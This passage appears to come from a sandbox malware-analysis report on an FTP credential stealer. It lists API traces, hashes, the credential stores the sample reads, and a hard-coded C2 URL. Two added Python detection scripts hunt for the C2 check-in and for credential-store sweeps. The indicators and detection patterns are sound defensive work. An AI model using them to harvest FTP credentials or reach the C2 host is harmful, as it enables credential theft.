                  • RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00408947
                  • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 004089E6
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseEnumOpen
                  • String ID: MRU
                  • API String ID: 1332880857-344939820
                  • Opcode ID: 845d2110dc0d070f6aad7f860df3a24118c130d8e70c858ad76698d3bd0dcbf9
                  • Instruction ID: f22ab4a82fd2cd57d0579e0df880e18baf2207f6d239757fe164980efb60308f
                  • Opcode Fuzzy Hash: 845d2110dc0d070f6aad7f860df3a24118c130d8e70c858ad76698d3bd0dcbf9
                  • Instruction Fuzzy Hash: 8A21187190010CBACF11AF91CD42FEE7BB9BF04304F10C4BAB555B50A1DBB95A91AF99
                  APIs
                  • RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?), ref: 00401AA7
                  • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,?,00000000,?,?), ref: 00401AC2
                  • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000000,00000001,?,?,00000000,?,00000000,?,?,?,00000000), ref: 00401AF8
                  • RegCloseKey.ADVAPI32(?,?,?,00000000,?,00000000,?,?,?,00000000,?,?), ref: 00401B1A
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: QueryValue$CloseOpen
                  • String ID:
                  • API String ID: 1586453840-0
                  • Opcode ID: 734e63243a4b052f08d431ee154be782bdd0b703d78beaf39269d2a8b41075f7
                  • Instruction ID: fcd29aeafba084525d8cf8d477a30aef63fb09e727f4365931236e5964b75f7d
                  • Opcode Fuzzy Hash: 734e63243a4b052f08d431ee154be782bdd0b703d78beaf39269d2a8b41075f7
                  • Instruction Fuzzy Hash: 86213931A00109FBDF119E95CD42FEE7BB9AB41344F104076F900A61A0EB799E95DB59
                  APIs
                  • lstrcmpiA.KERNEL32(00000000,logins), ref: 0040BA2B
                  • lstrcmp.KERNEL32(table,?), ref: 0040BA60
                    • Part of subcall function 0040B6D9: StrStrIA.SHLWAPI(?,() ), ref: 0040B6E9
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcmplstrcmpi
                  • String ID: logins$table
                  • API String ID: 3524194181-3800951466
                  • Opcode ID: 755972dacdf0f538ccdf233cfaf82257552857a2a336d6a9199289e497d3ea6f
                  • Instruction ID: e56b1581308bb119fc6df0d215a42fb934329492a1a349210f13653206e09008
                  • Opcode Fuzzy Hash: 755972dacdf0f538ccdf233cfaf82257552857a2a336d6a9199289e497d3ea6f
                  • Instruction Fuzzy Hash: 3331263190020DEBCF21AF90DC45ADE7B7CEB44324F508A67A120B52E4D735AA948B99
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: "password" : "
                  • API String ID: 0-2310853927
                  • Opcode ID: 1d96a41895556b83251d2f6e3fb8b7d77ae918bc5314d5579c167f32989cd641
                  • Instruction ID: 2d33af965a49b69b8bb2625fc5117d1ac98ebf99c167de9e1e88c861068832c0
                  • Opcode Fuzzy Hash: 1d96a41895556b83251d2f6e3fb8b7d77ae918bc5314d5579c167f32989cd641
                  • Instruction Fuzzy Hash: FA21AE31804119BADF12BBA1CD029EE7E75EF51348F110037F442B61B1D6BD5EA1A7AD
                  APIs
                  • wsprintfA.USER32 ref: 0040CEF7
                    • Part of subcall function 00401752: LocalFree.KERNEL32(00000000,?,004022A7,?,?,?,?,?,?), ref: 0040175E
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: FreeLocalwsprintf
                  • String ID: FTP Count$FTP File%d$SOFTWARE\Robo-FTP 3.7\Scripts
                  • API String ID: 988369812-376751567
                  • Opcode ID: b100f10a11de84d1554b8ee285c05a23e3408d70a51dad86b1af9e0baeba858a
                  • Instruction ID: 8ee0aa49f3dbd8388e6bbf4cfe452c84595b2709f6b7922b7d1b8c782d6353d8
                  • Opcode Fuzzy Hash: b100f10a11de84d1554b8ee285c05a23e3408d70a51dad86b1af9e0baeba858a
                  • Instruction Fuzzy Hash: 39017CB0900109FADF10AB91CC82EEEBA7AAB00315F108137F411B11E1D7BE9B849799
                  APIs
                  • ExitProcess.KERNEL32(?,80000000,00000003,00000000,00000003,00000000), ref: 00401236
                  • ReadFile.KERNEL32(?,?,00001000,?,00000000,?,80000000,00000003,00000000,00000003,00000000), ref: 0040125A
                  • CloseHandle.KERNEL32(?,?,?,00001000,?,00000000,?,80000000,00000003,00000000,00000003,00000000), ref: 00401266
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseExitFileHandleProcessRead
                  • String ID:
                  • API String ID: 1390701169-0
                  • Opcode ID: 8f966ebd87d4ad1bdfb4cacc6edce40de60726eb4d26d5180a226f6d6868328b
                  • Instruction ID: 2769c8dea532226ecc7d7cd99d09141729edcd609d6b994a67629c6e1451f681
                  • Opcode Fuzzy Hash: 8f966ebd87d4ad1bdfb4cacc6edce40de60726eb4d26d5180a226f6d6868328b
                  • Instruction Fuzzy Hash: F5F0FF31A50109BADF21AB50DD02FDDBA78AB1534DF1040B7B540F50E0D7B99B98DB58
                  APIs
                  • lstrlen.KERNEL32(?), ref: 00401BEE
                  • lstrlen.KERNEL32(00000000,?), ref: 00401BF8
                  • lstrcpy.KERNEL32(00000000,?), ref: 00401C0C
                  • lstrcat.KERNEL32(00000000,00000000), ref: 00401C15
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrlen$lstrcatlstrcpy
                  • String ID:
                  • API String ID: 2414487701-0
                  • Opcode ID: 80e65f7138c994cfb0136878f4e839e7a3c5ce9296fa90b956dbb6bd114dbf42
                  • Instruction ID: 7210d46c7f977a387d5a4157f85995c79d660d03c9cb68f517295ba27315881e
                  • Opcode Fuzzy Hash: 80e65f7138c994cfb0136878f4e839e7a3c5ce9296fa90b956dbb6bd114dbf42
                  • Instruction Fuzzy Hash: 7AF01C7520020CBEDF207F62CC81A993AA9EB1135DF10D03BB915291A2E77DC9889B68
                  APIs
                    • Part of subcall function 00403C18: WSAStartup.WSOCK32(00000101,?), ref: 00403C2D
                  • Sleep.KERNEL32(00001388,00000000,00000000,?,00000000), ref: 0040F9A3
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: SleepStartup
                  • String ID: Client Hash$http://gunnylaumienphi2017.com/
                  • API String ID: 1372284471-2480438733
                  • Opcode ID: 30d78c3068bdcfbc927ffa464f9ab81e646ffec13decf9da64cf830e54140e18
                  • Instruction ID: 7f5d7b3c7258f9699e047d75cdfbc3d880843b63fda77a6a8c62c076c1915490
                  • Opcode Fuzzy Hash: 30d78c3068bdcfbc927ffa464f9ab81e646ffec13decf9da64cf830e54140e18
                  • Instruction Fuzzy Hash: D62115B190010AAADF31DBE1C9457BFB674AB04308F10043BE640719E1D7BD4E8DDBAA
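The function block above pairs the hard-coded gate URL http://gunnylaumienphi2017.com/ with the string "Client Hash", a WSAStartup call and a Sleep of 0x1388 (5000 ms). The following Python is an added example for hunting that check-in in HTTP proxy logs; it is not part of the Joe Sandbox report and not code from the sample. The destination host is the indicator the report supports; treating "Client Hash" as the name of an HTTP request header on the POST, the JSON log format and the sample records are assumptions made for the example.

```python
"""Hunt for Pony-style C2 check-ins in HTTP proxy logs (added example).

Indicators taken from the function block above:
  - the gate URL http://gunnylaumienphi2017.com/
  - the string "Client Hash", assumed here (not stated in the report) to be
    sent as an HTTP request header on the POST
"""
import json
from collections import defaultdict
from datetime import datetime
from urllib.parse import urlsplit

C2_URLS = ["http://gunnylaumienphi2017.com/"]   # from the report
SUSPICIOUS_HEADERS = {"client hash"}             # assumed header name, lower-cased

# Constructed sample log, one JSON request per line. Not real traffic.
SAMPLE_LOG = r"""
{"ts":"2024-09-30T10:00:01Z","src":"10.0.0.5","method":"GET","url":"https://example.com/index.html","headers":{"User-Agent":"Mozilla/5.0"}}
{"ts":"2024-09-30T10:00:02Z","src":"10.0.0.5","method":"POST","url":"http://gunnylaumienphi2017.com/","headers":{"Client Hash":"0a1b2c3d","User-Agent":"Mozilla/4.0"}}
{"ts":"2024-09-30T10:00:07Z","src":"10.0.0.5","method":"POST","url":"http://gunnylaumienphi2017.com/","headers":{"User-Agent":"Mozilla/4.0"}}
{"ts":"2024-09-30T10:00:09Z","src":"10.0.0.9","method":"POST","url":"http://203.0.113.7/upload","headers":{"Client Hash":"ffee","Content-Type":"application/octet-stream"}}
this line is not json and must be skipped
"""


def c2_hosts():
    """Host names extracted from the configured C2 URLs."""
    return {urlsplit(u).hostname.lower() for u in C2_URLS}


def classify(record):
    """Reasons this request looks like a Pony check-in (empty list = clean)."""
    reasons = []
    host = (urlsplit(record.get("url", "")).hostname or "").lower()
    if host in c2_hosts():
        reasons.append(f"destination host {host} is a known C2 gate")
    hdrs = {k.lower(): v for k, v in record.get("headers", {}).items()}
    if hdrs.keys() & SUSPICIOUS_HEADERS and record.get("method", "").upper() == "POST":
        reasons.append("POST carries a 'Client Hash' header")
    return reasons


def hunt(log_text):
    """Parse one JSON record per line, skip junk, return (record, reasons) for hits."""
    hits = []
    for line in log_text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            rec = json.loads(line)
        except json.JSONDecodeError:
            continue            # malformed line: skip, do not abort the hunt
        reasons = classify(rec)
        if reasons:
            hits.append((rec, reasons))
    return hits


def c2_intervals(hits):
    """Seconds between successive requests to the C2 host from the same source.

    A steady short interval matches the Sleep(0x1388) = 5 s loop in the block above.
    """
    by_src = defaultdict(list)
    for rec, reasons in hits:
        if any("known C2 gate" in r for r in reasons):
            by_src[rec["src"]].append(datetime.fromisoformat(rec["ts"].replace("Z", "+00:00")))
    return {src: [int((b - a).total_seconds()) for a, b in zip(sorted(t), sorted(t)[1:])]
            for src, t in by_src.items()}


if __name__ == "__main__":
    found = hunt(SAMPLE_LOG)
    for rec, reasons in found:
        print(rec["ts"], rec["src"], rec["method"], rec["url"], "->", "; ".join(reasons))
    print("C2 beacon intervals:", c2_intervals(found))
```

The host match is the high-confidence signal; the header match alone (the 10.0.0.9 record) is a lead to triage, not a verdict, and should be paired with a process or destination context before alerting.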
                  APIs
                  • StrStrIA.SHLWAPI(007203F8,Odin), ref: 00409CD6
                    • Part of subcall function 00401752: LocalFree.KERNEL32(00000000,?,004022A7,?,?,?,?,?,?), ref: 0040175E
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: FreeLocal
                  • String ID: Odin$SiteInfo.QFP
                  • API String ID: 2826327444-4277389770
                  • Opcode ID: 7b2b0562af19308cab5df3c240f8d3627445577c8b0d13b07810e0c4eeb6aee6
                  • Instruction ID: 52af3856d4285a76f2f3712edfb672eb9e336cfc887af513c2a4a8862b141f07
                  • Opcode Fuzzy Hash: 7b2b0562af19308cab5df3c240f8d3627445577c8b0d13b07810e0c4eeb6aee6
                  • Instruction Fuzzy Hash: D901C430A4410579EB212B329D02FAE3E999B81314F24003BB815762E3D7BC9F41D2AD
                  APIs
                  • RegOpenKeyA.ADVAPI32(?,?,?), ref: 004071C7
                  • RegEnumValueA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 004071FB
                  • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040725E
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseEnumOpenValue
                  • String ID:
                  • API String ID: 4012628704-0
                  • Opcode ID: e3f31528690a5d0e6c30948a6af74a0b1baa7a872ff4fcafd0ccf506f34d5b5a
                  • Instruction ID: 86490294541cbf832a13796b5331e8b82cba92c417051bbcab69bd2e8fbd4de6
                  • Opcode Fuzzy Hash: e3f31528690a5d0e6c30948a6af74a0b1baa7a872ff4fcafd0ccf506f34d5b5a
                  • Instruction Fuzzy Hash: 1E11F87180410CBADF21AF90CC41BDEBBB9BF04304F1084BAB514B51A1DBB9AA959F99
                  APIs
                  • RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040EFA1
                  • RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040EFD5
                  • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040F02F
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseEnumOpen
                  • String ID:
                  • API String ID: 1332880857-0
                  • Opcode ID: dd645579e3552e097291bef1b6578a3e97a18589981779f92997be476961d565
                  • Instruction ID: 58e7d6fa5fdf71006491fd843ec2fce7242496fc44c56e62908c852a227b0491
                  • Opcode Fuzzy Hash: dd645579e3552e097291bef1b6578a3e97a18589981779f92997be476961d565
                  • Instruction Fuzzy Hash: 0011003590010CBADF11AF91CC01FDE7BB9BF04304F108976B514B51E1DBB99AA5AF54
                  APIs
                  • RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040EF02
                  • RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040EF32
                  • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040EF85
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseEnumOpen
                  • String ID:
                  • API String ID: 1332880857-0
                  • Opcode ID: 2b145e644b25eb118bebfec26bb60c2a092f0f550df4e1e63f2e08a3bfc347f0
                  • Instruction ID: 79d6ce66a9fe8589202b4e2849e13dc79f14a179371f355af88fa3d1fb127eda
                  • Opcode Fuzzy Hash: 2b145e644b25eb118bebfec26bb60c2a092f0f550df4e1e63f2e08a3bfc347f0
                  • Instruction Fuzzy Hash: 1A110C3191010DBADF11AF91CC02FDE7BB9BF00304F2085B6B514B51A1DBB99AA1AF58
                  APIs
                  • StrStrIA.SHLWAPI(?,EasyFTP), ref: 0040C78D
                    • Part of subcall function 00402200: lstrlen.KERNEL32(?), ref: 00402214
                    • Part of subcall function 00402200: StrStrIA.SHLWAPI(00000000,.exe,?), ref: 00402233
                    • Part of subcall function 00402200: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?), ref: 00402245
                    • Part of subcall function 00402200: lstrlen.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?), ref: 00402257
                    • Part of subcall function 00401752: LocalFree.KERNEL32(00000000,?,004022A7,?,?,?,?,?,?), ref: 0040175E
                  Strings
                  • EasyFTP, xrefs: 0040C785
                  • SOFTWARE\Classes\TypeLib\{F9043C88-F6F2-101A-A3C9-08002B2F49FB}\1.2\0\win32, xrefs: 0040C76F
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrlen$FreeLocal
                  • String ID: EasyFTP$SOFTWARE\Classes\TypeLib\{F9043C88-F6F2-101A-A3C9-08002B2F49FB}\1.2\0\win32
                  • API String ID: 1884169789-2776585315
                  • Opcode ID: ec2090e60952daeec575351be475198956329dce5317bbbe5c5100064533b710
                  • Instruction ID: 85cbf298f16898ee1e3ad3f2dea4e738ee09b13af73ee811f42477477b6d9026
                  • Opcode Fuzzy Hash: ec2090e60952daeec575351be475198956329dce5317bbbe5c5100064533b710
                  • Instruction Fuzzy Hash: 98F06D30A50209FAEF103BA1CC83FAD7E75AB00B44F20413ABA01791F2DBB95B509A5C
                  APIs
                    • Part of subcall function 00401769: LocalAlloc.KERNEL32(00000040,00402200,?,00402280,?), ref: 00401777
                  • SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,00000105), ref: 00401CB1
                  Strings
                  • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00401CE6
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: AllocFolderLocalPath
                  • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                  • API String ID: 1254228173-2036018995
                  • Opcode ID: ecacdd65099fff17406014d1aaabd04013573c28d7e727f9bbd7af76f059d322
                  • Instruction ID: 97deef55f889460ea03d1c0e73911c6992c1b02bd37731b1ccd0826d76856a05
                  • Opcode Fuzzy Hash: ecacdd65099fff17406014d1aaabd04013573c28d7e727f9bbd7af76f059d322
                  • Instruction Fuzzy Hash: 93017171A48205EFEB119B54CE41B9AB7B4AB00714F248137E612BA1F0E778EA50EB4D
                  APIs
                  • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00407A6F
                    • Part of subcall function 00401BCD: lstrlen.KERNEL32(?), ref: 00401BEE
                    • Part of subcall function 00401BCD: lstrlen.KERNEL32(00000000,?), ref: 00401BF8
                    • Part of subcall function 00401BCD: lstrcpy.KERNEL32(00000000,?), ref: 00401C0C
                    • Part of subcall function 00401BCD: lstrcat.KERNEL32(00000000,00000000), ref: 00401C15
                    • Part of subcall function 00401752: LocalFree.KERNEL32(00000000,?,004022A7,?,?,?,?,?,?), ref: 0040175E
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrlen$DirectoryFreeLocalWindowslstrcatlstrcpy
                  • String ID: \32BitFtp.ini
                  • API String ID: 2776971706-1260517637
                  • Opcode ID: 1cb0484594f6157d45a57629beea73c99a87447080c23abbe336f535a30bf1ea
                  • Instruction ID: b264c63a17963ad57f187d581c1cea9d5644dcb8ea268a62fb368e62467bf330
                  • Opcode Fuzzy Hash: 1cb0484594f6157d45a57629beea73c99a87447080c23abbe336f535a30bf1ea
                  • Instruction Fuzzy Hash: E5F08270A00108BAEF10BBA1CC42FDE7A689F44748F100477B644F51E2DBF9AB905B5C
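The function blocks above show the sample probing one FTP client's credential store after another through RegOpenKeyA/RegEnumKeyExA/RegQueryValueExA and ReadFile: the SOFTWARE\Robo-FTP 3.7\Scripts key ("FTP Count", "FTP File%d"), the EasyFTP install path resolved through its TypeLib key, 32BitFtp.ini under the Windows directory (GetWindowsDirectoryA followed by lstrcat), and a SiteInfo.QFP file looked up next to the string "Odin". The Python below is an added detection example, not part of the report and not the sample's code: it takes constructed Sysmon-style registry and file-read events and alerts when one process touches two or more distinct stores within a short window, which a legitimate FTP client does not do. The store locations are the strings from this report; the event line format, the 60-second window and the threshold of two are assumptions chosen for the example.

```python
"""Flag a process that sweeps several FTP-client credential stores (added example).

Store locations come from the strings in the function blocks above. The event
format, the 60-second window and the threshold are assumptions for this example.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# (label, substring matched case-insensitively against a registry key or file path)
CREDENTIAL_STORES = [
    ("Robo-FTP scripts key",   r"software\robo-ftp 3.7\scripts"),
    ("EasyFTP TypeLib lookup", r"software\classes\typelib\{f9043c88-f6f2-101a-a3c9-08002b2f49fb}\1.2\0\win32"),
    ("32bit FTP ini",          r"\32bitftp.ini"),
    ("SiteInfo.QFP",           r"siteinfo.qfp"),
]
WINDOW = timedelta(seconds=60)   # assumed tuning value
THRESHOLD = 2                    # distinct stores touched by one process


def match_store(target):
    """Label of the credential store a key/file path belongs to, or None."""
    t = target.lower()
    for label, needle in CREDENTIAL_STORES:
        if needle in t:
            return label
    return None


def parse_event(line):
    """'<iso time>|<pid>|<image>|<RegistryEvent|FileRead>|<target>' -> dict, or None."""
    parts = line.strip().split("|", 4)
    if len(parts) != 5:
        return None
    ts, pid, image, kind, target = parts
    try:
        when = datetime.fromisoformat(ts)
        return {"ts": when, "pid": int(pid), "image": image, "kind": kind, "target": target}
    except ValueError:
        return None


def detect_sweep(events):
    """Alerts as (pid, image, first_hit_ts, sorted labels) for every process that
    hits >= THRESHOLD distinct stores within WINDOW of one of its hits."""
    touched = defaultdict(list)   # pid -> [(ts, label)]
    images = {}
    for ev in events:
        label = match_store(ev["target"])
        if label is None:
            continue              # e.g. the benign Shell Folders lookup
        touched[ev["pid"]].append((ev["ts"], label))
        images[ev["pid"]] = ev["image"]
    alerts = []
    for pid, hits in touched.items():
        hits.sort()
        for i, (start, _) in enumerate(hits):          # sliding window anchored at each hit
            labels = {lab for ts, lab in hits[i:] if ts - start <= WINDOW}
            if len(labels) >= THRESHOLD:
                alerts.append((pid, images[pid], start, sorted(labels)))
                break
    return alerts


# Constructed sample telemetry; not events recorded by the sandbox run.
SAMPLE_EVENTS = """
2024-09-30T10:00:00|6632|C:\\Users\\user\\Desktop\\2qsdqACnX3.exe|RegistryEvent|HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders
2024-09-30T10:00:01|6632|C:\\Users\\user\\Desktop\\2qsdqACnX3.exe|RegistryEvent|HKLM\\SOFTWARE\\Robo-FTP 3.7\\Scripts
2024-09-30T10:00:01|6632|C:\\Users\\user\\Desktop\\2qsdqACnX3.exe|RegistryEvent|HKLM\\SOFTWARE\\Classes\\TypeLib\\{F9043C88-F6F2-101A-A3C9-08002B2F49FB}\\1.2\\0\\win32
2024-09-30T10:00:02|6632|C:\\Users\\user\\Desktop\\2qsdqACnX3.exe|FileRead|C:\\Windows\\32BitFtp.ini
2024-09-30T10:05:00|4120|C:\\Program Files\\Robo-FTP\\Robo-FTP.exe|RegistryEvent|HKLM\\SOFTWARE\\Robo-FTP 3.7\\Scripts
2024-09-30T10:20:00|4120|C:\\Program Files\\Robo-FTP\\Robo-FTP.exe|FileRead|C:\\Windows\\32BitFtp.ini
garbage line
"""


def run(sample=SAMPLE_EVENTS):
    """Parse the sample telemetry and return the alerts."""
    events = [e for e in (parse_event(l) for l in sample.splitlines()) if e]
    return detect_sweep(events)


if __name__ == "__main__":
    for pid, image, first, labels in run():
        print(f"pid {pid} ({image}) swept {len(labels)} stores from {first}: {', '.join(labels)}")
```

The Robo-FTP process in the sample touches two stores but fifteen minutes apart, so it stays below the window; the point of the rule is breadth plus speed, which is what a stealer's harvest loop looks like and what a single client's normal start-up does not.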
                  APIs
                  • LoadLibraryA.KERNEL32(?), ref: 004022B4
                  • GetProcAddress.KERNEL32(00000000,?), ref: 004022E2
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: AddressLibraryLoadProc
                  • String ID:
                  • API String ID: 2574300362-0
                  • Opcode ID: 0f749165927d9a0347e95b2b40a320660c170a1640660f197713828e4d2df242
                  • Instruction ID: d06432f4dc182ffac08f2039f883e23e9f9a8286cc76ceb82120973f00c3edba
                  • Opcode Fuzzy Hash: 0f749165927d9a0347e95b2b40a320660c170a1640660f197713828e4d2df242
                  • Instruction Fuzzy Hash: 3DF0B47721501516D7106579AD44A9B6F88E7E3378B10513BF805B62C1E1FDDDC2C3A4
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmp
